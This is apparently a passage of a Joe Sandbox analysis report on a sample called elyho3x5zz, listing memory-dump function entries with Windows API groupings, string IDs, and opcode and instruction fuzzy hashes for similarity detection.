      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Menu$Item$CountCreateInfoInsertPopup
      • String ID: 2$P
      • API String ID: 93392585-1110268094
      • Opcode ID: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
      • Instruction ID: 8cb2bef919a6e9697c1087c2ebb5647d98f14d37df1ab46348050779fae161ba
      • Opcode Fuzzy Hash: 46a49604fdc7cbe7f64919669a233ff3b62d38c72d86d24d888cad9356e87a30
      • Instruction Fuzzy Hash: A7513436E086A299F720EF61E4422BDB7A5BB80758FA54175DA1E436D4CF3CE481B320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$LongMessageSend$Show
      • String ID: '
      • API String ID: 257662517-1997036262
      • Opcode ID: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
      • Instruction ID: 6e4328418e9f1fcf5a61980beea5e2fb7a3295a1b8d500f8efb3aea72d745906
      • Opcode Fuzzy Hash: eb894a93846cd46a5342e3ebb468783be677627f1867a2ee8fe2f5b975b70651
      • Instruction Fuzzy Hash: 6251193A90864295F360AB26A45667DB750FBC1B90FD84172DE5E43791CE3EEA42F330
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: IconLoad_invalid_parameter_noinfo
      • String ID: blank$info$question$stop$warning
      • API String ID: 4060274358-404129466
      • Opcode ID: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
      • Instruction ID: 2ee5eead9733b58061be7b07badf9c4981b17986956d5679509dec1728499cd6
      • Opcode Fuzzy Hash: a20ad64d4c1f0ff606b53834bd72c3c9b388472799770000db1625183137431d
      • Instruction Fuzzy Hash: C0216D29F0C793A1FA50BB16A90317AE365AFC4790FC540B5DE1D43396DE7CE401B620
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
      • String ID:
      • API String ID: 1211466189-0
      • Opcode ID: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
      • Instruction ID: d2461295f700e8f13f931b95c932b077d0820efd8fbee06610dfbb0cbc14cacb
      • Opcode Fuzzy Hash: e4483054fe90d725006c88ea8490581a4df116f0e1f8785d266180591fe398c1
      • Instruction Fuzzy Hash: 7FA1322AB1829392FB6CAF25D151739B7A8FBD4B44F405075EE1A83A90CF3CE850B710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ShowWindow
      • String ID:
      • API String ID: 1268545403-0
      • Opcode ID: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
      • Instruction ID: 0891c61fe367dd59240f22b53f3b70ca9c0e8b1280f25366906c77ca29190ae9
      • Opcode Fuzzy Hash: cc21e6db9a044589e755c4703016b6e1d9c57170080a8525f9bf3d2d7d54c8f4
      • Instruction Fuzzy Hash: 0451A33DE0D1C3A8F774BB29A44637DA7A59FD2B04F9841F1C60E426D9CE2DA484F220
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
      • String ID:
      • API String ID: 3864802216-0
      • Opcode ID: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
      • Instruction ID: 60f3f122074c851851ab249106654558050a67f676bf93f956b3b22ab8796411
      • Opcode Fuzzy Hash: 51e6ec7aa37fc3003482106919c843e152de56e0f8813b4e66b1a7a4e18ad1cb
      • Instruction Fuzzy Hash: FC41DE3A6187818BE364DB22B405B6ABBA5F788BD1F548031EF8A43F14DF3DD4409B00
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo
      • String ID:
      • API String ID: 3215553584-0
      • Opcode ID: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
      • Instruction ID: 3200f9c0dcbf999d15e64b4f2c1d4879819b2e06ea4d218032a94a9b4f452a5c
      • Opcode Fuzzy Hash: c2757373dfb26c044112a110afa25e05e956175428925470acde8015b00b00d1
      • Instruction Fuzzy Hash: 38C1F46AA0C782A6FA60EF16980227DEB51FFC0B80F954175EA4E07395CF3DE441B761
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ArraySafe$Data$Access$UnaccessVartype
      • String ID:
      • API String ID: 2550207440-0
      • Opcode ID: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
      • Instruction ID: 488fa39a10c7ae4ce31ba2dcc7e24e5f7620c4cacc7b0ae689f1364750c78f8a
      • Opcode Fuzzy Hash: 00c2af4dc047eb3328d9db7280bab1605e51150c83bde12361ed7da654b6a987
      • Instruction Fuzzy Hash: EFA1BFAAA0C602A9FF14AB25C8863BCE761FB85B84F954471DA0D47295DF7CE480F360
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ObjectSelect$BeginCreatePath
      • String ID:
      • API String ID: 3225163088-0
      • Opcode ID: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
      • Instruction ID: 2bf9cca50fd12c34f9ee845f69b2f9d27303b5b4413ef76f5ecdcfdba06240d2
      • Opcode Fuzzy Hash: e150efe4bbb5a68fe2f4df4e615a944ed6587934d7859263685a3daad39b8607
      • Instruction Fuzzy Hash: DDA1AD76A0C6C097E7749F19A4016AEFB75FBC9B98F904125EA8913B68CB3CD442DF10
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSendWindow$Enabled
      • String ID:
      • API String ID: 3694350264-0
      • Opcode ID: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
      • Instruction ID: d283dfdce43186ccf3896165c7dbc039a0d488a72b55f9eaaca4e9950d83c3d5
      • Opcode Fuzzy Hash: e552656ad26ad0b4c81c10bd500660535feecaec2312c49fbee9d36c63c42a0a
      • Instruction Fuzzy Hash: 6D91B139E0C64666FB74AB1580563B9A391AFC4780FD440B2CA6D03692CF2EE681F321
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessagePost$KeyboardState$Parent
      • String ID:
      • API String ID: 87235514-0
      • Opcode ID: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
      • Instruction ID: f284f737d7a1c559f5bacdb38ae3b45e6545d5823adc72d0c57273cb35e3b71e
      • Opcode Fuzzy Hash: f9339e9b515e9b8f23d28b48758f4b43b45cdaeeceea552a0e587170ddb5bff8
      • Instruction Fuzzy Hash: 9551B31AA0D2E165F7719B72510267DAF91FB86BC0F8890B4DE8917F46CE29E450F320
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessagePost$KeyboardState$Parent
      • String ID:
      • API String ID: 87235514-0
      • Opcode ID: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
      • Instruction ID: d3322550058d9a5e47eb9e05a78b8d3c11f20d4d078619e73d226d2191a20351
      • Opcode Fuzzy Hash: e18e0e2c600af16f3ee63314e1511203568865ab3516c571b9de0b17f9c371ff
      • Instruction Fuzzy Hash: 3851A116A1C2E165F761A771510267DAFA1FBC6BC0FC980F4EE8907E46CA18E454B331
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Internet$CloseConnectErrorEventHandleHttpLastOpenRequest
      • String ID:
      • API String ID: 3401586794-0
      • Opcode ID: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
      • Instruction ID: c9cb3a1eee00163c4363eaf3b4e27b542ec3a7821d30aa7c83528962655fff1e
      • Opcode Fuzzy Hash: 253a407ca22485da5ca56320f2061644023828f6bd6f560db9f49e2617228af6
      • Instruction Fuzzy Hash: C051067B608781A6FB14EF21A8016AEF7A4FB89B88F944171DE0D03B54DF39D455EB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: From$ErrorModeProg$AddressCreateFreeInstanceProcStringTasklstrcmpi
      • String ID: DllGetClassObject
      • API String ID: 668425406-1075368562
      • Opcode ID: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
      • Instruction ID: 2dd1f6cdf07a10fe3c2a38587d10162a13a42bff88f98a8805b44940335bb8c9
      • Opcode Fuzzy Hash: 214bc254c47588fde01e5fc27ee3c6930efb076d9c02937a19424ffc77af6643
      • Instruction Fuzzy Hash: AE519D36A08B66A3FB18AF16E542379A360FB94784F948074DB4947A40DF7CF094F710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: LongMessageSendWindow
      • String ID:
      • API String ID: 3360111000-0
      • Opcode ID: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
      • Instruction ID: 01e241839957166375ae3fdc4efc632f2950a9972aad7673de83a48a640d2b59
      • Opcode Fuzzy Hash: 10b92532f4478cd50d58fa8196457338f991273d8d1c085252422c4c1f4f913a
      • Instruction Fuzzy Hash: C041822AB19A4591FB60EB1AE492679B360EBC4F94F944172CE1E43BA5CF3DE441F310
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: ErrorLastinet_addrsocket
      • String ID:
      • API String ID: 4170576061-0
      • Opcode ID: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
      • Instruction ID: cb6939d189dd8e1f801dbf6fdbe4e1872465267b3140584fa7846d1c171269ad
      • Opcode Fuzzy Hash: 6f732a3ceb6dc8ae0713a757b729ef5f32bd0ba729350ec97b60288269ebfabf
      • Instruction Fuzzy Hash: 4A41D03AA0878296F720AF25A4456ADB360FB85BA4F844271DE5E47BA1CF3CD445E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: Menu$CreateItem$DrawInfoInsertPopup
      • String ID:
      • API String ID: 161812096-0
      • Opcode ID: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
      • Instruction ID: 95091ba4bce2b56c46a65d453012e5f7a721fdbf47c32d04624ecc8c2bffbccc
      • Opcode Fuzzy Hash: 22fcd4b96cb08b999353f17b01c1e421480795c8207f5970277f026457662bef
      • Instruction Fuzzy Hash: 5C418A3AA04B01D9FB50DF22E8812AC73A4FB84B98F964171DE4D43769CF3AE455E710
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
      • String ID:
      • API String ID: 3761583154-0
      • Opcode ID: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
      • Instruction ID: 4f4f5c92c8950a5da1cc1a3168c80605e4fa4793b7b7956d3d7bd123dcc0d6dd
      • Opcode Fuzzy Hash: 470201b7a7510a06dd913372f332e36f0e26382b67c565ba0de27237d0cac92a
      • Instruction Fuzzy Hash: CE31B629B08B4599FB64AF12E445168B7A0FB88FD0F844276DA4D43790CF3CE444A314
      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: AllocByteCharMultiStringWide
      • String ID:
      • API String ID: 3603722519-0
      • Opcode ID: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
      • Instruction ID: 6309bd6d950b7c51ea9c3039465c71416c265c4edb31d5d727175cd56a174333
      • Opcode Fuzzy Hash: cf43f2be6eb4bd68818497ac57658916f6485d2528bb62b4acf40de2ec05e3b3
      • Instruction Fuzzy Hash: E531C135A08B459AFB20AF12E405169F3A4FB94F90F884276EA5D43795CF3CE484A700
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: MessageSend$CreateObjectStockWindow
      • String ID: Msctls_Progress32
      • API String ID: 1025951953-3636473452
      • Opcode ID: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
      • Instruction ID: e8dbd3d72693cb2e9218c736ba08259649a57877c78607039caa97c5bb51d25d
      • Opcode Fuzzy Hash: 175e965b11afd85df2c3a996d4a298cb258778d92a24fde76c77afeddb8f143d
      • Instruction Fuzzy Hash: 4731983A60868187F3609F24F485B5AB361EBC8790F408239EB8843F58CF3DD841DB10
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_7ff73a1d0000_elyho3x5zz.jbxd
      Similarity
      • API ID: CreateHandlePipe
      • String ID: nul
      • API String ID: 1424370930-2873401336
      • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
      • Instruction ID: 59977a20a617b7ce0ff08814d00ad3dcaa41077a1e7a13314340ed680e5299b0
      • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
      • Instruction Fuzzy Hash: FB21802AA18B6692FB14AB24D015379A3A0FBC5F78F904371DA6E067D5DF7CD004A720
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.2466337713.00007FF73A1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A1D0000, based on PE: true
      • Associated: 00000000.00000002.2466324756.00007FF73A1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A285000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466433158.00007FF73A2A8000.00000002.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466473467.00007FF73A2BA000.00000004.00000001.01000000.00000003.sdmpDownload File
      • Associated: 00000000.00000002.2466505958.00007FF73A2C4000.00000002.00000001.01000000.00000003.sdmpDownload File
      Joe Sandbox IDA Plugin
